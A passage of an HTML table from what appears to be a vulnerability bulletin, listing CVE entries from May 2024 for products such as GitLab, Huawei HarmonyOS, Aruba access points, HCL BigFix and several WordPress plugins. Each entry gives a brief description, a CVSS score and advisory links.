<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34699" target="_blank">CVE-2024-34699</a><br><a href="https://github.com/GZTimeWalker/GZCTF/commit/31e775b65cddf82a567d68dcdc78c1739b746346" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/GZTimeWalker/GZCTF/security/advisories/GHSA-p6rq-5x3x-rmhh" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>German Mesky--GMAce<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in German Mesky GMAce allows Path Traversal.This issue affects GMAce: from n/a through 1.5.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23872&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23872" target="_blank">CVE-2023-23872</a><br><a href="https://patchstack.com/database/vulnerability/gmace/wordpress-gmace-plugin-1-5-2-arbitrary-file-download-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>GhozyLab, Inc.--Popup Builder<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in GhozyLab, Inc. Popup Builder allows Stored XSS.This issue affects Popup Builder: from n/a through 1.1.29.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34567&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34567" target="_blank">CVE-2024-34567</a><br><a href="https://patchstack.com/database/vulnerability/easy-notify-lite/wordpress-easy-notify-lite-plugin-1-1-29-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2. A problem with the processing logic for Discord Integrations Chat Messages can lead to a regular expression DoS attack on the server.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6682&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6682" target="_blank">CVE-2023-6682</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/434821" target="_blank">cve@gitlab.com</a><br><a href="https://hackerone.com/reports/2269012" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.11 prior to 16.11.2. A problem with the processing logic for Google Chat Messages integration may lead to a regular expression DoS attack on the server.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6688&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6688" target="_blank">CVE-2023-6688</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/434854" target="_blank">cve@gitlab.com</a><br><a href="https://hackerone.com/reports/2270362" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.11 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2. The pins endpoint is susceptible to DoS through a crafted request.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2454&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2454" target="_blank">CVE-2024-2454</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/450405" target="_blank">cve@gitlab.com</a><br><a href="https://hackerone.com/reports/2408226" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.7, all versions starting from 16.10 before 16.10.5, all versions starting from 16.11 before 16.11.2. It was possible for an attacker to cause a denial of service using maliciously crafted markdown content.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2651&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2651" target="_blank">CVE-2024-2651</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/450830" target="_blank">cve@gitlab.com</a><br><a href="https://hackerone.com/reports/2408619" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab EE affecting all versions from 16.7 before 16.9.7, all versions starting from 16.10 before 16.10.5, all versions starting from 16.11 before 16.11.2. An attacker could force a user with an active SAML session to approve an MR via CSRF.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4597&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4597" target="_blank">CVE-2024-4597</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/438686" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>GitLab--GitLab<br> </td>
<td>An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2 where abusing the API to filter branch and tags could lead to Denial of Service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4539&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4539" target="_blank">CVE-2024-4539</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/454815" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>Google--Gvisor<br> </td>
<td>A denial of service exists in Gvisor Sandbox where a bug in reference counting code in mount point tracking could lead to a panic, making it possible for an attacker running as root and with permission to mount volumes to kill the sandbox. We recommend upgrading past commit 6a112c60a257dadac59962e0bc9e9b5aee70b5b6</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-7258&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-7258" target="_blank">CVE-2023-7258</a><br><a href="https://github.com/google/gvisor/commit/6a112c60a257dadac59962e0bc9e9b5aee70b5b6" target="_blank">cve-coordination@google.com</a></td>
</tr>
<tr>
<td>Guido--VS Contact Form<br> </td>
<td>Guessable CAPTCHA vulnerability in Guido VS Contact Form allows Functionality Bypass.This issue affects VS Contact Form: from n/a through 14.7.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30540&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30540" target="_blank">CVE-2024-30540</a><br><a href="https://patchstack.com/database/vulnerability/very-simple-contact-form/wordpress-vs-contact-form-plugin-14-7-sum-captcha-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Gutenify--Gutenify<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Gutenify.This issue affects Gutenify: from n/a through 1.4.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35165&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35165" target="_blank">CVE-2024-35165</a><br><a href="https://patchstack.com/database/vulnerability/gutenify/wordpress-gutenify-plugin-1-4-0-sensitive-data-exposure-via-api-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>HCL Software--BigFix Platform<br> </td>
<td>An attacker could potentially intercept credentials via the task manager and perform unauthorized access to the Client Deploy Tool on Windows systems.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23583&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23583" target="_blank">CVE-2024-23583</a><br><a href="https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0113140" target="_blank">psirt@hcl.com</a></td>
</tr>
<tr>
<td>HCL Software--BigFix Platform<br> </td>
<td>Cross-Site Request Forgery (CSRF) on Session Token vulnerability that could potentially lead to Remote Code Execution (RCE).</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23554&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23554" target="_blank">CVE-2024-23554</a><br><a href="https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0113140" target="_blank">psirt@hcl.com</a></td>
</tr>
<tr>
<td>HCL Software--BigFix Platform<br> </td>
<td>SSL/TLS Renegotiation functionality potentially leading to DoS attack vulnerability.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23556&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23556" target="_blank">CVE-2024-23556</a><br><a href="https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0113140" target="_blank">psirt@hcl.com</a></td>
</tr>
<tr>
<td>HCL Software--DRYiCE Lucy<br> </td>
<td>HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37526&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37526" target="_blank">CVE-2023-37526</a><br><a href="https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0113032" target="_blank">psirt@hcl.com</a></td>
</tr>
<tr>
<td>Harknell--AWSOM News Announcement<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harknell AWSOM News Announcement allows Stored XSS.This issue affects AWSOM News Announcement: from n/a through 1.6.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34428&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34428" target="_blank">CVE-2024-34428</a><br><a href="https://patchstack.com/database/vulnerability/awsom-news-announcement/wordpress-awsom-news-announcement-plugin-1-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Multiple unauthenticated Denial-of-Service (DoS) vulnerabilities exists in the Soft AP daemon accessed via the PAPI protocol. Successful exploitation of these vulnerabilites result in the ability to interrupt the normal operation of the affected Access Point.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31478&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31478" target="_blank">CVE-2024-31478</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Unauthenticated Denial of Service (DoS) vulnerabilities exist in the Central Communications service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to interrupt the normal operation of the affected service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31479&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31479" target="_blank">CVE-2024-31479</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Unauthenticated Denial of Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to interrupt the normal operation of the affected service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31480&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31480" target="_blank">CVE-2024-31480</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Unauthenticated Denial of Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to interrupt the normal operation of the affected service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31481&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31481" target="_blank">CVE-2024-31481</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>An unauthenticated Denial-of-Service (DoS) vulnerability exists in the ANSI escape code service accessed via the PAPI protocol. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected Access Point.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31482&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31482" target="_blank">CVE-2024-31482</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>An authenticated sensitive information disclosure vulnerability exists in the CLI service accessed via the PAPI protocol. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31483&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31483" target="_blank">CVE-2024-31483</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hidden Depth--Sticky banner<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hidden Depth Sticky banner allows Stored XSS.This issue affects Sticky banner: from n/a through 1.2.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35170&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35170" target="_blank">CVE-2024-35170</a><br><a href="https://patchstack.com/database/vulnerability/sticky-banner/wordpress-sticky-banner-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Highfivery LLC--Zero Spam<br> </td>
<td>Client-Side Enforcement of Server-Side Security vulnerability in Highfivery LLC Zero Spam allows Removing Important Client Functionality.This issue affects Zero Spam: from n/a through 5.5.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32521&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32521" target="_blank">CVE-2024-32521</a><br><a href="https://patchstack.com/database/vulnerability/zero-spam/wordpress-zero-spam-for-wordpress-plugin-5-5-5-bypass-spam-protection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>The WindowManager module has a vulnerability in permission control. Impact: Successful exploitation of this vulnerability may affect confidentiality.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-52721&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52721" target="_blank">CVE-2023-52721</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Permission verification vulnerability in the system sharing pop-up module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32990&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32990" target="_blank">CVE-2024-32990</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Denial of service (DoS) vulnerability in the AMS module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32995&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32995" target="_blank">CVE-2024-32995</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Privilege escalation vulnerability in the account module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32996&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32996" target="_blank">CVE-2024-32996</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Cracking vulnerability in the OS security module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32999&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32999" target="_blank">CVE-2024-32999</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Cracking vulnerability in the OS security module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4046&amp;vector=CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4046" target="_blank">CVE-2024-4046</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Out-of-bounds access vulnerability in the memory module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32993&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L" target="_blank" title="CVSS V3 Score">5.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32993" target="_blank">CVE-2024-32993</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>NULL pointer access vulnerability in the clock module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32998&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32998" target="_blank">CVE-2024-32998</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Double-free vulnerability in the RSMC module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-52383&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52383" target="_blank">CVE-2023-52383</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Double-free vulnerability in the RSMC module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-52384&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52384" target="_blank">CVE-2023-52384</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Race condition vulnerability in the soundtrigger module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-52720&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52720" target="_blank">CVE-2023-52720</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huseyin Berberoglu--WP Favorite Posts<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Huseyin Berberoglu WP Favorite Posts.This issue affects WP Favorite Posts: from n/a through 1.6.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34427&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34427" target="_blank">CVE-2024-34427</a><br><a href="https://patchstack.com/database/vulnerability/wp-favorite-posts/wordpress-wp-favorite-posts-plugin-1-6-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>IBM--App Connect Enterprise<br> </td>
<td>IBM App Connect Enterprise 11.0.0.1 through 11.0.0.25 and 12.0.1.0 through 12.0.12.0 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 285245.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28761&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
